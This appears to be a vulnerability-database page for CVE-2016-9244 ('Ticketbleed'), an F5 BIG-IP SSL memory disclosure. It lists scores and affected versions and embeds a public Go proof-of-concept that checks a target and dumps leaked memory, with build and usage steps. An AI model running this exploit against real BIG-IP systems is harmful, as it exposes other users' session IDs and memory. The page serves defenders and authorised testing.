CVE-2016-9244

high

Published 2017-02-09 · Modified 2026-05-13

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

7.5

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

8.5

Description

A BIG-IP virtual server configured with a Client SSL profile that has the non-default Session Tickets option enabled may leak up to 31 bytes of uninitialized memory. A remote attacker may exploit this vulnerability to obtain Secure Sockets Layer (SSL) session IDs from other sessions. It is possible that other data from uninitialized memory may be returned as well.

Predictions

Exploit likelihood

83%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-44446 remote hardware

@0x00string · 2017-02-14

F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure

Source code queued for fetch — refresh in a moment.

EDB-41298 remote hardware python · 4 KB

Ege Balci · 2017-02-10

F5 BIG-IP SSL Virtual Server - 'Ticketbleed' Memory Disclosure

python exploit Source: Exploit-DB

/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege BalcÄ±]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]




BUILD:
	go get github.com/EgeBalci/Ticketbleed
	go build Ticketbleed.go

USAGE:
	./ticketbleed <options> <ip:port>
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message

*/
package main

import "github.com/EgeBalci/Ticketbleed"
import "strconv"
import "strings"
import "fmt"
import "os"


var OutputFile string = ""
var BleedSize int = 0

func main() {


	ARGS := os.Args[1:]
	if len(ARGS) < 1 || len(ARGS) > 5{
		fmt.Println(Help)
		os.Exit(1)
	}

  	for i := 0; i < len(ARGS); i++{

		if ARGS[i] == "-h" || ARGS[i] == "--help"{
			fmt.Println(Help)
			os.Exit(1)
	  	}

		if ARGS[i] == "-o" || ARGS[i] == "--out"{
			OutputFile = ARGS[i+1]
	  	}

	  	if ARGS[i] == "-s" || ARGS[i] == "--size"{
	  		Size,err := strconv.Atoi(ARGS[i+1])
	  		if err != nil {
	  			fmt.Println("[-] ERROR: Invalid size value !")
	  			os.Exit(1)
	  		}
	  		if Size < 0 {
	  			fmt.Println("[-] ERROR: Size can't be smaller than 0")
	  			os.Exit(1)
	  		}else{
	  			BleedSize = Size
	  		}
	  	}
 	}

	if OutputFile != "" {
		File, FileErr := os.Create(OutputFile)
		if FileErr != nil {
			fmt.Println("[-] ERROR: While creating output file !")
			os.Exit(1)
		}
		File.Close()
		fmt.Println("[*] Output file: "+OutputFile)
	}

 	VulnStatus := Ticketbleed.Check(ARGS[0])								// First check if it's vulnerable
 	fmt.Println(VulnStatus)
 	if strings.Contains(VulnStatus, "[+]") {
 		
 		go Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))  		// With using multiple threads it is easyer to move on stack
 		Ticketbleed.Exploit(ARGS[0], OutputFile, (BleedSize/2))				// Othervise server echoes back alot of duplicate value
 	}

}



var Help string = `
â–„â–„â–„â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–“ â–ˆâ–ˆâ–“ â–„â–ˆâ–ˆâ–ˆâ–ˆâ–„   â–ˆâ–ˆ â–„â–ˆâ–€â–“â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–„â–„â–„â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–“ â–„â–„â–„â–„    â–ˆâ–ˆâ–“    â–“â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–“â–ˆâ–ˆâ–ˆâ–ˆâ–ˆ â–“â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–„ 
â–“  â–ˆâ–ˆâ–’ â–“â–’â–“â–ˆâ–ˆâ–’â–’â–ˆâ–ˆâ–€ â–€â–ˆ   â–ˆâ–ˆâ–„â–ˆâ–’ â–“â–ˆ   â–€â–“  â–ˆâ–ˆâ–’ â–“â–’â–“â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–„ â–“â–ˆâ–ˆâ–’    â–“â–ˆ   â–€ â–“â–ˆ   â–€ â–’â–ˆâ–ˆâ–€ â–ˆâ–ˆâ–Œ
â–’ â–“â–ˆâ–ˆâ–‘ â–’â–‘â–’â–ˆâ–ˆâ–’â–’â–“â–ˆ    â–„ â–“â–ˆâ–ˆâ–ˆâ–„â–‘ â–’â–ˆâ–ˆâ–ˆ  â–’ â–“â–ˆâ–ˆâ–‘ â–’â–‘â–’â–ˆâ–ˆâ–’ â–„â–ˆâ–ˆâ–’â–ˆâ–ˆâ–‘    â–’â–ˆâ–ˆâ–ˆ   â–’â–ˆâ–ˆâ–ˆ   â–‘â–ˆâ–ˆ   â–ˆâ–Œ
â–‘ â–“â–ˆâ–ˆâ–“ â–‘ â–‘â–ˆâ–ˆâ–‘â–’â–“â–“â–„ â–„â–ˆâ–ˆâ–’â–“â–ˆâ–ˆ â–ˆâ–„ â–’â–“â–ˆ  â–„â–‘ â–“â–ˆâ–ˆâ–“ â–‘ â–’â–ˆâ–ˆâ–‘â–ˆâ–€  â–’â–ˆâ–ˆâ–‘    â–’â–“â–ˆ  â–„ â–’â–“â–ˆ  â–„ â–‘â–“â–ˆâ–„   â–Œ
  â–’â–ˆâ–ˆâ–’ â–‘ â–‘â–ˆâ–ˆâ–‘â–’ â–“â–ˆâ–ˆâ–ˆâ–€ â–‘â–’â–ˆâ–ˆâ–’ â–ˆâ–„â–‘â–’â–ˆâ–ˆâ–ˆâ–ˆâ–’ â–’â–ˆâ–ˆâ–’ â–‘ â–‘â–“â–ˆ  â–€â–ˆâ–“â–‘â–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–ˆâ–’â–‘â–’â–ˆâ–ˆâ–ˆâ–ˆâ–’â–‘â–’â–ˆâ–ˆâ–ˆâ–ˆâ–’â–‘â–’â–ˆâ–ˆâ–ˆâ–ˆâ–“ 
  â–’ â–‘â–‘   â–‘â–“  â–‘ â–‘â–’ â–’  â–‘â–’ â–’â–’ â–“â–’â–‘â–‘ â–’â–‘ â–‘ â–’ â–‘â–‘   â–‘â–’â–“â–ˆâ–ˆâ–ˆâ–€â–’â–‘ â–’â–‘â–“  â–‘â–‘â–‘ â–’â–‘ â–‘â–‘â–‘ â–’â–‘ â–‘ â–’â–’â–“  â–’ 
    â–‘     â–’ â–‘  â–‘  â–’   â–‘ â–‘â–’ â–’â–‘ â–‘ â–‘  â–‘   â–‘    â–’â–‘â–’   â–‘ â–‘ â–‘ â–’  â–‘ â–‘ â–‘  â–‘ â–‘ â–‘  â–‘ â–‘ â–’  â–’ 
  â–‘       â–’ â–‘â–‘        â–‘ â–‘â–‘ â–‘    â–‘    â–‘       â–‘    â–‘   â–‘ â–‘      â–‘      â–‘    â–‘ â–‘  â–‘ 
          â–‘  â–‘ â–‘      â–‘  â–‘      â–‘  â–‘         â–‘          â–‘  â–‘   â–‘  â–‘   â–‘  â–‘   â–‘    
             â–‘                                    â–‘                        â–‘      

Author: Ege Balci
Github: github.com/EgeBalci


USAGE: 
	./ticketbleed <ip:port> <options> 
OPTIONS:
	-o, --out 	Output filename for raw memory
	-s, --size 	Size in bytes to read
	-h, --help 	Print this message
`

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41298.zip

Application impact

Vendor	Product	Versions
f5	big-ip_local_traffic_manager	`11.4.0`
f5	big-ip_local_traffic_manager	`11.4.1`
f5	big-ip_local_traffic_manager	`11.5.0`
f5	big-ip_local_traffic_manager	`11.5.1`
f5	big-ip_local_traffic_manager	`11.5.2`
f5	big-ip_local_traffic_manager	`11.5.3`
f5	big-ip_local_traffic_manager	`11.5.4`
f5	big-ip_local_traffic_manager	`11.6.0`
f5	big-ip_local_traffic_manager	`11.6.1`
f5	big-ip_local_traffic_manager	`12.0.0`
f5	big-ip_local_traffic_manager	`12.1.0`
f5	big-ip_local_traffic_manager	`12.1.1`
f5	big-ip_local_traffic_manager	`12.1.2`
f5	big-ip_application_acceleration_manager	`11.4.0`
f5	big-ip_application_acceleration_manager	`11.4.1`
f5	big-ip_application_acceleration_manager	`11.5.0`
f5	big-ip_application_acceleration_manager	`11.5.1`
f5	big-ip_application_acceleration_manager	`11.5.2`
f5	big-ip_application_acceleration_manager	`11.5.3`
f5	big-ip_application_acceleration_manager	`11.5.4`
f5	big-ip_application_acceleration_manager	`11.6.0`
f5	big-ip_application_acceleration_manager	`11.6.1`
f5	big-ip_application_acceleration_manager	`12.0.0`
f5	big-ip_application_acceleration_manager	`12.1.0`
f5	big-ip_application_acceleration_manager	`12.1.1`
f5	big-ip_application_acceleration_manager	`12.1.2`
f5	big-ip_advanced_firewall_manager	`11.4.0`
f5	big-ip_advanced_firewall_manager	`11.4.1`
f5	big-ip_advanced_firewall_manager	`11.5.0`
f5	big-ip_advanced_firewall_manager	`11.5.1`
f5	big-ip_advanced_firewall_manager	`11.5.2`
f5	big-ip_advanced_firewall_manager	`11.5.3`
f5	big-ip_advanced_firewall_manager	`11.5.4`
f5	big-ip_advanced_firewall_manager	`11.6.0`
f5	big-ip_advanced_firewall_manager	`11.6.1`
f5	big-ip_advanced_firewall_manager	`12.0.0`
f5	big-ip_advanced_firewall_manager	`12.1.0`
f5	big-ip_advanced_firewall_manager	`12.1.1`
f5	big-ip_advanced_firewall_manager	`12.1.2`
f5	big-ip_analytics	`11.4.0`
f5	big-ip_analytics	`11.4.1`
f5	big-ip_analytics	`11.5.0`
f5	big-ip_analytics	`11.5.1`
f5	big-ip_analytics	`11.5.2`
f5	big-ip_analytics	`11.5.3`
f5	big-ip_analytics	`11.5.4`
f5	big-ip_analytics	`11.6.0`
f5	big-ip_analytics	`11.6.1`
f5	big-ip_analytics	`12.0.0`
f5	big-ip_analytics	`12.1.0`
f5	big-ip_analytics	`12.1.1`
f5	big-ip_analytics	`12.1.2`
f5	big-ip_access_policy_manager	`11.4.0`
f5	big-ip_access_policy_manager	`11.4.1`
f5	big-ip_access_policy_manager	`11.5.0`
f5	big-ip_access_policy_manager	`11.5.1`
f5	big-ip_access_policy_manager	`11.5.2`
f5	big-ip_access_policy_manager	`11.5.3`
f5	big-ip_access_policy_manager	`11.5.4`
f5	big-ip_access_policy_manager	`11.6.0`
f5	big-ip_access_policy_manager	`11.6.1`
f5	big-ip_access_policy_manager	`12.0.0`
f5	big-ip_access_policy_manager	`12.1.0`
f5	big-ip_access_policy_manager	`12.1.1`
f5	big-ip_access_policy_manager	`12.1.2`
f5	big-ip_application_security_manager	`11.4.0`
f5	big-ip_application_security_manager	`11.4.1`
f5	big-ip_application_security_manager	`11.5.0`
f5	big-ip_application_security_manager	`11.5.1`
f5	big-ip_application_security_manager	`11.5.2`
f5	big-ip_application_security_manager	`11.5.3`
f5	big-ip_application_security_manager	`11.5.4`
f5	big-ip_application_security_manager	`11.6.0`
f5	big-ip_application_security_manager	`11.6.1`
f5	big-ip_application_security_manager	`12.0.0`
f5	big-ip_application_security_manager	`12.1.0`
f5	big-ip_application_security_manager	`12.1.1`
f5	big-ip_application_security_manager	`12.1.2`
f5	big-ip_global_traffic_manager	`11.4.0`
f5	big-ip_global_traffic_manager	`11.4.1`
f5	big-ip_global_traffic_manager	`11.5.0`
f5	big-ip_global_traffic_manager	`11.5.1`
f5	big-ip_global_traffic_manager	`11.5.2`
f5	big-ip_global_traffic_manager	`11.5.3`
f5	big-ip_global_traffic_manager	`11.5.4`
f5	big-ip_global_traffic_manager	`11.6.0`
f5	big-ip_global_traffic_manager	`11.6.1`
f5	big-ip_link_controller	`11.4.0`
f5	big-ip_link_controller	`11.4.1`
f5	big-ip_link_controller	`11.5.0`
f5	big-ip_link_controller	`11.5.1`
f5	big-ip_link_controller	`11.5.2`
f5	big-ip_link_controller	`11.5.3`
f5	big-ip_link_controller	`11.5.4`
f5	big-ip_link_controller	`11.6.0`
f5	big-ip_link_controller	`11.6.1`
f5	big-ip_link_controller	`12.0.0`
f5	big-ip_link_controller	`12.1.0`
f5	big-ip_link_controller	`12.1.1`
f5	big-ip_link_controller	`12.1.2`
f5	big-ip_policy_enforcement_manager	`11.4.0`
f5	big-ip_policy_enforcement_manager	`11.4.1`
f5	big-ip_policy_enforcement_manager	`11.5.0`
f5	big-ip_policy_enforcement_manager	`11.5.1`
f5	big-ip_policy_enforcement_manager	`11.5.2`
f5	big-ip_policy_enforcement_manager	`11.5.3`
f5	big-ip_policy_enforcement_manager	`11.5.4`
f5	big-ip_policy_enforcement_manager	`11.6.0`
f5	big-ip_policy_enforcement_manager	`11.6.1`
f5	big-ip_policy_enforcement_manager	`12.0.0`
f5	big-ip_policy_enforcement_manager	`12.1.0`
f5	big-ip_policy_enforcement_manager	`12.1.1`
f5	big-ip_policy_enforcement_manager	`12.1.2`
f5	big-ip_protocol_security_module	`11.4.0`
f5	big-ip_protocol_security_module	`11.4.1`

References

CWEs

CWE-200

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.